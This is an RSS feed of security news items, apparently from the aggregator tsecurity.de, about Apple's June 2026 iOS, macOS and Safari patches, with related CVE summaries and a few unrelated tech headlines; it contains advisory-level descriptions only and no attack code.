<p data-start="2276" data-end="2412">A large portion of the update focuses on WebKit vulnerabilities, the browser engine that powers Safari and other <a href="https://thecyberexpress.com/new-apple-security-update/" target="_blank" rel="noopener">Apple applications</a>.</p>
<p data-start="2414" data-end="2681">According to Apple's advisory, the fixes address multiple security issues that could allow malicious web content to disclose sensitive user information, trigger unexpected crashes, corrupt memory, bypass browser restrictions, or enable cross-origin <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28880">data</a> exfiltration.</p>
<p data-start="2683" data-end="2914">The advisory also patches vulnerabilities that could allow malicious websites to process restricted web content outside the browser sandbox, disclose process memory, or leak sensitive information through permissions-related issues.</p>
<p data-start="2916" data-end="3099">Apple said the flaws were addressed through improved memory management, input validation, bounds checking, and stronger <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="28881">security</a> origin tracking.</p>

<h3 data-section-id="1qo922l" data-start="3101" data-end="3162"><strong>Safari, WebRTC and Other Components Receive Security Fixes</strong></h3>
<p data-start="3164" data-end="3346">Beyond WebKit, the Apple Security Update includes fixes for vulnerabilities affecting <a href="https://thecyberexpress.com/safari-cybersecurity-best-practices-apples/" target="_blank" rel="noopener">Safari security</a>, WebRTC, libxslt, Web Extensions, WebKit Canvas, and WebKit Storage.</p>
<p data-start="3348" data-end="3367">According to Apple:</p>

<ul data-start="3369" data-end="3915">
 	<li data-section-id="1j06bn9" data-start="3369" data-end="3490">Two libxslt vulnerabilities could cause unexpected process crashes when processing maliciously crafted web content.</li>
 	<li data-section-id="1jsjmxm" data-start="3491" data-end="3597">A Web Extensions <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="28879">vulnerability</a> could allow a malicious extension to trigger an unexpected process crash.</li>
 	<li data-section-id="lqi7at" data-start="3598" data-end="3698">A WebKit Storage vulnerability could enable a malicious website to silently hijack clipboard data.</li>
 	<li data-section-id="10t7ye7" data-start="3699" data-end="3915">Multiple WebRTC vulnerabilities could lead to Safari crashes or unexpected process termination after processing malicious web content.</li>
</ul>
<h3 data-section-id="6t6fw8" data-start="3917" data-end="3964"><strong>Apple Credits Researchers for Reporting CVEs</strong></h3>
<p data-start="3966" data-end="4358">Apple acknowledged dozens of security researchers and organizations that reported the patched <a href="https://thecyberexpress.com/cve-2026-20245-cisco-catalyst/" target="_blank" rel="noopener">CVE vulnerabilities</a>, including researchers from Positive Technologies, STAR Labs SG, DEVCORE Research Team, Talence Security, Calif.io, NVIDIA AI Red Team, Braze Security Team, <a href="https://thecyberexpress.com/lessons-from-autonomous-ai-cyberattack/" target="_blank" rel="noopener">Anthropic</a>, <a href="https://thecyberexpress.com/openai-daybreak-introduces-gpt-5-5/" target="_blank" rel="noopener">OpenAI Codex Security</a>, ThreatBook, and Baidu Security, among others.</p>
<p data-start="4360" data-end="4668">The company reiterated that it does not publicly disclose or discuss security issues until investigations have been completed and software updates have been released to customers. Apple also noted that its security advisories reference CVE identifiers whenever possible.</p>
<p data-start="4670" data-end="4962" data-is-last-node="" data-is-only-node="">The latest Apple Security Update delivers broad protections across core operating system components, reinforcing Apple's ongoing efforts to address security vulnerabilities affecting supported iPhone and iPad devices through regular software updates.</p>

</div>
</div>
</div>
</div>
</div>
</div>
</section></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Patches 30+ iOS, macOS, Safari Flaws, Including AI-Discovered WebKit Bugs]]></title>
<description><![CDATA[Apple on Monday released security updates for iOS, macOS, and the Safari web browser to address over three dozen flaws, including four vulnerabilities in WebKit that were discovered using artificial intelligence (AI) tools like Anthropic Claude and OpenAI Codex Security.

The WebKit vulnerabiliti...]]></description>
<link>https://tsecurity.de/de/3634841/it-security-nachrichten/apple-patches-30-ios-macos-safari-flaws-including-ai-discovered-webkit-bugs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634841/it-security-nachrichten/apple-patches-30-ios-macos-safari-flaws-including-ai-discovered-webkit-bugs/</guid>
<pubDate>Tue, 30 Jun 2026 09:35:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple on Monday released security updates for iOS, macOS, and the Safari web browser to address over three dozen flaws, including four vulnerabilities in WebKit that were discovered using artificial intelligence (AI) tools like Anthropic Claude and OpenAI Codex Security.

The WebKit vulnerabilities are listed below -


  CVE-2026-43707 - A memory corruption issue that could result in an]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-28979 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web out-of-bounds (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability has been found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1 and classified as problematic. The affected element is an unknown function of the component Web Handler. The manipulation leads to out-of-bounds read.

This vulnerability is traded as CVE-2026-28979. It is possible...]]></description>
<link>https://tsecurity.de/de/3634744/sicherheitsluecken/cve-2026-28979-apple-safariiosipadosmacos-up-to-2651-web-out-of-bounds-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634744/sicherheitsluecken/cve-2026-28979-apple-safariiosipadosmacos-up-to-2651-web-out-of-bounds-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 08:38:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. The affected element is an unknown function of the component <em>Web Handler</em>. The manipulation leads to out-of-bounds read.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-28979">CVE-2026-28979</a>. It is possible to initiate the attack remotely. There is no exploit available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-39872 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web denial of service (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. It has been classified as problematic. Affected by this vulnerability is an unknown functionality of the component Web Handler. Performing a manipulation results in denial of service.

This vulnerability is known as CV...]]></description>
<link>https://tsecurity.de/de/3634743/sicherheitsluecken/cve-2026-39872-apple-safariiosipadosmacos-up-to-2651-web-denial-of-service-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634743/sicherheitsluecken/cve-2026-39872-apple-safariiosipadosmacos-up-to-2651-web-denial-of-service-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 08:38:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is an unknown functionality of the component <em>Web Handler</em>. Performing a manipulation results in denial of service.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-39872">CVE-2026-39872</a>. Remote exploitation of the attack is possible. No exploit is available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43676 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web out-of-bounds (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. It has been rated as problematic. This affects an unknown part of the component Web Handler. The manipulation leads to out-of-bounds read.

This vulnerability is uniquely identified as CVE-2026-43676. The attack is pos...]]></description>
<link>https://tsecurity.de/de/3634741/sicherheitsluecken/cve-2026-43676-apple-safariiosipadosmacos-up-to-2651-web-out-of-bounds-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634741/sicherheitsluecken/cve-2026-43676-apple-safariiosipadosmacos-up-to-2651-web-out-of-bounds-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 08:38:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown part of the component <em>Web Handler</em>. The manipulation leads to out-of-bounds read.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-43676">CVE-2026-43676</a>. The attack is possible to be carried out remotely. No exploit exists.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43663 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web denial of service (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. This issue affects some unknown processing of the component Web Handler. This manipulation causes denial of service.

The identification of this vulnerability is CVE-2026-43663. It is ...]]></description>
<link>https://tsecurity.de/de/3634740/sicherheitsluecken/cve-2026-43663-apple-safariiosipadosmacos-up-to-2651-web-denial-of-service-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634740/sicherheitsluecken/cve-2026-43663-apple-safariiosipadosmacos-up-to-2651-web-denial-of-service-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 08:38:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. This issue affects some unknown processing of the component <em>Web Handler</em>. This manipulation causes denial of service.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-43663">CVE-2026-43663</a>. It is possible to initiate the attack remotely. There is no exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Gogs-Lücke gibt jedem Konto RCE-Rechte auf dem Server]]></title>
<description><![CDATA[Eine kritische Lücke in der selbst gehosteten Git-Plattform Gogs gibt jedem angemeldeten Konto Rechte zur Remote Code Execution auf dem Server. Ein öffentlich verfügbares Metasploit-Modul automatisiert den Angriff in Se­kun­den. Ver­si­on 0.14.3 behebt die Schwachstelle.]]></description>
<link>https://tsecurity.de/de/3634630/it-security-nachrichten/gogs-luecke-gibt-jedem-konto-rce-rechte-auf-dem-server/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634630/it-security-nachrichten/gogs-luecke-gibt-jedem-konto-rce-rechte-auf-dem-server/</guid>
<pubDate>Tue, 30 Jun 2026 07:37:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eine kritische Lücke in der selbst gehosteten Git-Plattform Gogs gibt jedem angemeldeten Konto Rechte zur Remote Code Execution auf dem Server. Ein öffentlich verfügbares Metasploit-Modul automatisiert den Angriff in Se­kun­den. Ver­si­on 0.14.3 behebt die Schwachstelle.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-43441 | Apple Safari/tvOS/visionOS/iOS/iPadOS up to 26.0 Web Content memory corruption (Nessus ID 303073 / WID-SEC-2025-2480)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Apple Safari, tvOS, visionOS, iOS and iPadOS up to 26.0. Affected is an unknown function of the component Web Content Handler. Such manipulation leads to memory corruption.

This vulnerability is listed as CVE-2025-43441. The attack ...]]></description>
<link>https://tsecurity.de/de/3634582/sicherheitsluecken/cve-2025-43441-apple-safaritvosvisionosiosipados-up-to-260-web-content-memory-corruption-nessus-id-303073-wid-sec-2025-2480/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634582/sicherheitsluecken/cve-2025-43441-apple-safaritvosvisionosiosipados-up-to-260-web-content-memory-corruption-nessus-id-303073-wid-sec-2025-2480/</guid>
<pubDate>Tue, 30 Jun 2026 07:08:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, tvOS, visionOS, iOS and iPadOS up to 26.0</a>. Affected is an unknown function of the component <em>Web Content Handler</em>. Such manipulation leads to memory corruption.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2025-43441">CVE-2025-43441</a>. The attack may be performed from remote. There is no available exploit.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-43457 | Apple Safari/visionOS/watchOS/iOS/iPadOS up to 26.0 Web Content use after free (EUVD-2025-37646 / Nessus ID 303253)]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, visionOS, watchOS, iOS and iPadOS up to 26.0. It has been classified as critical. This affects an unknown part of the component Web Content Handler. The manipulation leads to use after free.

This vulnerability is documented as CVE-2025-43457. The attack...]]></description>
<link>https://tsecurity.de/de/3634580/sicherheitsluecken/cve-2025-43457-apple-safarivisionoswatchosiosipados-up-to-260-web-content-use-after-free-euvd-2025-37646-nessus-id-303253/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634580/sicherheitsluecken/cve-2025-43457-apple-safarivisionoswatchosiosipados-up-to-260-web-content-use-after-free-euvd-2025-37646-nessus-id-303253/</guid>
<pubDate>Tue, 30 Jun 2026 07:08:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, visionOS, watchOS, iOS and iPadOS up to 26.0</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown part of the component <em>Web Content Handler</em>. The manipulation leads to use after free.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2025-43457">CVE-2025-43457</a>. The attack can be initiated remotely. There is not any exploit available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-43438 | Apple Safari/visionOS/watchOS/iOS/iPadOS up to 26.0 Web Content use after free (EUVD-2025-37676 / Nessus ID 303074)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Apple Safari, visionOS, watchOS, iOS and iPadOS up to 26.0. The affected element is an unknown function of the component Web Content Handler. Executing a manipulation can lead to use after free.

The identification of this vulnerability...]]></description>
<link>https://tsecurity.de/de/3634577/sicherheitsluecken/cve-2025-43438-apple-safarivisionoswatchosiosipados-up-to-260-web-content-use-after-free-euvd-2025-37676-nessus-id-303074/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634577/sicherheitsluecken/cve-2025-43438-apple-safarivisionoswatchosiosipados-up-to-260-web-content-use-after-free-euvd-2025-37676-nessus-id-303074/</guid>
<pubDate>Tue, 30 Jun 2026 07:08:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/apple:safari">Apple Safari, visionOS, watchOS, iOS and iPadOS up to 26.0</a>. The affected element is an unknown function of the component <em>Web Content Handler</em>. Executing a manipulation can lead to use after free.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2025-43438">CVE-2025-43438</a>. The attack may be launched remotely. There is no exploit available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 26.5.2, iPadOS 26.5.2 und macOS 26.5.2: Wichtige Sicherheitsfixes wegen KI]]></title>
<description><![CDATA[In der Nacht zum Dienstag hat Apple drei Betriebssystem-Updates und ein neues Safari für ältere macOS-Versionen publiziert. Apple fürchtet schnellere Angriffe.]]></description>
<link>https://tsecurity.de/de/3634519/it-security-nachrichten/ios-2652-ipados-2652-und-macos-2652-wichtige-sicherheitsfixes-wegen-ki/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634519/it-security-nachrichten/ios-2652-ipados-2652-und-macos-2652-wichtige-sicherheitsfixes-wegen-ki/</guid>
<pubDate>Tue, 30 Jun 2026 06:37:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In der Nacht zum Dienstag hat Apple drei Betriebssystem-Updates und ein neues Safari für ältere macOS-Versionen publiziert. Apple fürchtet schnellere Angriffe.]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 26.5.2, iPadOS 26.5.2 und macOS 26.5.2: Wichtige Sicherheitsfixes wegen KI]]></title>
<description><![CDATA[In der Nacht zum Dienstag hat Apple drei Betriebssystem-Updates und ein neues Safari für ältere macOS-Versionen publiziert. Apple fürchtet schnellere Angriffe.]]></description>
<link>https://tsecurity.de/de/3634515/it-nachrichten/ios-2652-ipados-2652-und-macos-2652-wichtige-sicherheitsfixes-wegen-ki/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634515/it-nachrichten/ios-2652-ipados-2652-und-macos-2652-wichtige-sicherheitsfixes-wegen-ki/</guid>
<pubDate>Tue, 30 Jun 2026 06:32:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In der Nacht zum Dienstag hat Apple drei Betriebssystem-Updates und ein neues Safari für ältere macOS-Versionen publiziert. Apple fürchtet schnellere Angriffe.]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 & 10: Microsoft behebt Boot- und Treiber-Fehler nach Juni-Update]]></title>
<description><![CDATA[Microsoft hat den Support-Zeitplan für ältere Systeme und spezialisierte Serverumgebungen überarbeitet. Das Programm für erweiterte Sicherheitsupdates ...]]></description>
<link>https://tsecurity.de/de/3634190/windows-server/windows-11-10-microsoft-behebt-boot-und-treiber-fehler-nach-juni-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634190/windows-server/windows-11-10-microsoft-behebt-boot-und-treiber-fehler-nach-juni-update/</guid>
<pubDate>Tue, 30 Jun 2026 00:31:01 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft hat den Support-Zeitplan für ältere Systeme und spezialisierte Serverumgebungen überarbeitet. Das Programm für erweiterte Sicherheitsupdates ...]]></content:encoded>
</item>
<item>
<title><![CDATA[26.5.2 Updates Squash Vulnerabilities in macOS, iOS, iPadOS, and Safari]]></title>
<description><![CDATA[Apple has released macOS 26.5.2, iOS 26.5.2 and iPadOS 26.5.2, and Safari 26.5.2, addressing 29 security vulnerabilities. Most fixes target WebKit, with additional patches for the kernel and other components. No exploits have been reported in the wild.]]></description>
<link>https://tsecurity.de/de/3634011/ios-mac-os/2652-updates-squash-vulnerabilities-in-macos-ios-ipados-and-safari/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634011/ios-mac-os/2652-updates-squash-vulnerabilities-in-macos-ios-ipados-and-safari/</guid>
<pubDate>Mon, 29 Jun 2026 22:54:10 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released macOS 26.5.2, iOS 26.5.2 and iPadOS 26.5.2, and Safari 26.5.2, addressing 29 security vulnerabilities. Most fixes target WebKit, with additional patches for the kernel and other components. No exploits have been reported in the wild.<p><a href="https://tidbits.com/2016/02/12/os-x-hidden-treasures-quick-look/"><picture><source srcset="https://tidbits.com/uploads/2018/05/TB-Quick-Look-ad-640x200.png" media="(max-width: 600px)" type="image/png"><img src="https://tidbits.com/uploads/2018/05/TB-Quick-Look-ad-1456x180.png" srcset="https://tidbits.com/uploads/2018/05/TB-Quick-Look-ad-1456x180.png 1456w, https://tidbits.com/uploads/2018/05/TB-Quick-Look-ad-1456x180-640x79.png 640w" alt="macOS Hidden Treasures: Quick Look"></picture></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[MacOS Tahoe 26.5.2 Update Released with Security Patches]]></title>
<description><![CDATA[MacOS Tahoe 26.5.2 has been released by Apple for Mac users running the Tahoe operating system. The update includes security patches and is therefore recommended for all users to install. Separately, Apple has released iOS 26.5.2 for iPhone, iPadOS 26.5.2 for iPad, and Safari 26.5.2 for MacOS Seq...]]></description>
<link>https://tsecurity.de/de/3633916/ios-mac-os/macos-tahoe-2652-update-released-with-security-patches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633916/ios-mac-os/macos-tahoe-2652-update-released-with-security-patches/</guid>
<pubDate>Mon, 29 Jun 2026 21:39:48 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>MacOS Tahoe 26.5.2 has been released by Apple for Mac users running the Tahoe operating system. The update includes security patches and is therefore recommended for all users to install. Separately, Apple has released iOS 26.5.2 for iPhone, iPadOS 26.5.2 for iPad, and Safari 26.5.2 for MacOS Sequoia and Sonoma users. How to Download &amp; ... <a class="read-more" href="https://osxdaily.com/2026/06/29/macos-tahoe-26-5-2-update-released-with-security-patches/">Read More</a></p>
<p>The post <a href="https://osxdaily.com/2026/06/29/macos-tahoe-26-5-2-update-released-with-security-patches/">MacOS Tahoe 26.5.2 Update Released with Security Patches</a> appeared first on <a href="https://osxdaily.com/">OS X Daily</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Don't wait to update: iOS 26.5.2 includes over 25 security fixes for web browsing]]></title>
<description><![CDATA[Apple's iOS 26.5.2 update adds a variety of fixes to keep your data safe while browsing the web. Here's what you need to know and why you should update.iOS 26.5.2 includes more than 25 security fixes.On Monday, just under a month after releasing iOS 26.5.1, Apple made iOS 26.5.2 available for dow...]]></description>
<link>https://tsecurity.de/de/3633848/ios-mac-os/dont-wait-to-update-ios-2652-includes-over-25-security-fixes-for-web-browsing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633848/ios-mac-os/dont-wait-to-update-ios-2652-includes-over-25-security-fixes-for-web-browsing/</guid>
<pubDate>Mon, 29 Jun 2026 21:08:48 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple's <a href="https://appleinsider.com/inside/ios-26" title="iOS 26" data-kpt="1">iOS 26.5.2</a> update adds a variety of fixes to keep your data safe while browsing the web. Here's what you need to know and why you should update.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68109-143565-66065-138436-62453-129472-59986-123984-iOS-18-revised-2-xl-xl-xl-xl.jpg" alt="Two iPhones on a dark background showing Safari features, including article summaries and relevant data. Colorful text labels highlight Safari, Article Summaries, Get Relevant Data, and Highlights." height="738" class=""><br><span>iOS 26.5.2 includes more than 25 security fixes.</span></div><br>On Monday, just under a month after <a href="https://appleinsider.com/articles/26/06/01/update-for-ios-2651-fixes-iphone-17-iphone-air-wired-charging-bug">releasing</a> iOS 26.5.1, Apple made iOS 26.5.2 <a href="https://appleinsider.com/articles/26/06/29/new-2652-security-patch-arrives-for-ios-ipados-macos">available</a> for download. The update <a href="https://support.apple.com/en-us/127594">contains</a> more than 25 different security enhancements, and over 15 of them are related to WebKit.<br><br>Notably, Apple patched two WebKit vulnerabilities that used maliciously crafted web content to disclose sensitive information. One of the vulnerabilities, a cross-origin issue, was resolved with improved tracking of security origins, while the other security issue was addressed with validation improvements.<br><br><br> <a href="https://appleinsider.com/articles/26/06/29/dont-wait-to-update-ios-2652-includes-over-25-security-fixes-for-web-browsing?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244822?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[heise+ | LG Smart-TV OLED65G66 im Test: Bessere Bildverarbeitung, unklarer KI-Einsatz]]></title>
<description><![CDATA[Heller, brillanter, besser abgestimmt – LG behebt einige Schwächen des Vorgängers. Was die neuen KI-Funktionen des OLED-TV im Alltag bringen, klärt unser Test.]]></description>
<link>https://tsecurity.de/de/3632924/it-nachrichten/heise-lg-smart-tv-oled65g66-im-test-bessere-bildverarbeitung-unklarer-ki-einsatz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632924/it-nachrichten/heise-lg-smart-tv-oled65g66-im-test-bessere-bildverarbeitung-unklarer-ki-einsatz/</guid>
<pubDate>Mon, 29 Jun 2026 14:47:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Heller, brillanter, besser abgestimmt – LG behebt einige Schwächen des Vorgängers. Was die neuen KI-Funktionen des OLED-TV im Alltag bringen, klärt unser Test.]]></content:encoded>
</item>
<item>
<title><![CDATA['The best browser for Macs': Some Mac users are surprisingly defending Microsoft Edge, but here's why I use Firefox instead of both]]></title>
<description><![CDATA[Users on X have been debating whether Microsoft Edge or Safari is the best web browser for Mac.]]></description>
<link>https://tsecurity.de/de/3632857/it-nachrichten/the-best-browser-for-macs-some-mac-users-are-surprisingly-defending-microsoft-edge-but-heres-why-i-use-firefox-instead-of-both/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632857/it-nachrichten/the-best-browser-for-macs-some-mac-users-are-surprisingly-defending-microsoft-edge-but-heres-why-i-use-firefox-instead-of-both/</guid>
<pubDate>Mon, 29 Jun 2026 14:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Users on X have been debating whether Microsoft Edge or Safari is the best web browser for Mac.]]></content:encoded>
</item>
<item>
<title><![CDATA[Xiaomi-Handys erhalten ein neues Software-Update, das ein besonders jetzt wichtiges Problem löst]]></title>
<description><![CDATA[Passend zu den steigenden Temperaturen behebt Xiaomi ein kritisches Hitzeproblem auf seinen Top-Smartphones.]]></description>
<link>https://tsecurity.de/de/3629349/android-tipps/xiaomi-handys-erhalten-ein-neues-software-update-das-ein-besonders-jetzt-wichtiges-problem-loest/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629349/android-tipps/xiaomi-handys-erhalten-ein-neues-software-update-das-ein-besonders-jetzt-wichtiges-problem-loest/</guid>
<pubDate>Sat, 27 Jun 2026 11:40:17 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Passend zu den steigenden Temperaturen behebt Xiaomi ein kritisches Hitzeproblem auf seinen Top-Smartphones.]]></content:encoded>
</item>
<item>
<title><![CDATA[Brandneues Fritz-Update steht bereit – diese Geräte erhalten 3 Verbesserungen]]></title>
<description><![CDATA[FRITZ spendiert einigen Repeatern ein neues Update, das nicht nur Fehler behebt, sondern auch praktische Verbesserungen mitbringt.]]></description>
<link>https://tsecurity.de/de/3629311/it-nachrichten/brandneues-fritz-update-steht-bereit-diese-geraete-erhalten-3-verbesserungen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629311/it-nachrichten/brandneues-fritz-update-steht-bereit-diese-geraete-erhalten-3-verbesserungen/</guid>
<pubDate>Sat, 27 Jun 2026 11:02:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FRITZ spendiert einigen Repeatern ein neues Update, das nicht nur Fehler behebt, sondern auch praktische Verbesserungen mitbringt.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Workspace Weekly Recap - June 26, 2026]]></title>
<description><![CDATA[Troubleshoot formula errors quickly with Gemini in Google SheetsWe’re excited to introduce a new Gemini in Sheets capability that enables you to diagnose and fix formula errors in one click. When you encounter a formula error, Gemini can analyze the surrounding data structure to help provide an e...]]></description>
<link>https://tsecurity.de/de/3628382/web-tipps/google-workspace-weekly-recap-june-26-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628382/web-tipps/google-workspace-weekly-recap-june-26-2026/</guid>
<pubDate>Fri, 26 Jun 2026 20:54:41 +0200</pubDate>
<category>Web Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Troubleshoot formula errors quickly with Gemini in Google Sheets</h3><div>We’re excited to introduce a new Gemini in Sheets capability that enables you to diagnose and fix formula errors in one click. When you encounter a formula error, Gemini can analyze the surrounding data structure to help provide an easy-to-understand explanation of the core issue alongside a corrected version of the formula. | <a href="https://workspaceupdates.googleblog.com/2026/06/troubleshoot-formula-errors-in-sheets.html" target="_blank">Learn more</a>.</div><h3>Enhanced security monitoring with expanded Admin password reset alerts</h3><div>In Alert Center, we are expanding the existing “Super Admin password reset” alert into a broader Admin password reset alert. With this update, the alert will now cover password resets for all administrator roles within your organization. | <a href="https://workspaceupdates.googleblog.com/2026/06/enhanced-security-monitoring-with-expanded-Admin-password-reset-alerts.html" target="_blank">Learn more</a>.</div><h3>Join Google Meet calls from Safari on iOS devices</h3><div>Prior to this update, iOS users without the Gmail or Meet apps were unable to participate in Google Meet sessions on their mobile devices. Now, iOS mobile device users can join meetings directly through Safari, without needing to install an app. | <a href="https://workspaceupdates.googleblog.com/2026/06/join-google-meet-calls-from-safari-on-iOS-devices.html" target="_blank">Learn more</a>.</div><h3>Google Apps Script is now a Google Workspace core service with enterprise-grade data protection</h3><div>Google Apps Script is officially a Google Workspace core service. Covered under the Google Cloud Terms of Service and Google Workspace for Education Terms of Service, Apps Script now offers the same enterprise-grade data protection, robust administrative controls, and standard technical support that safeguards other core services. 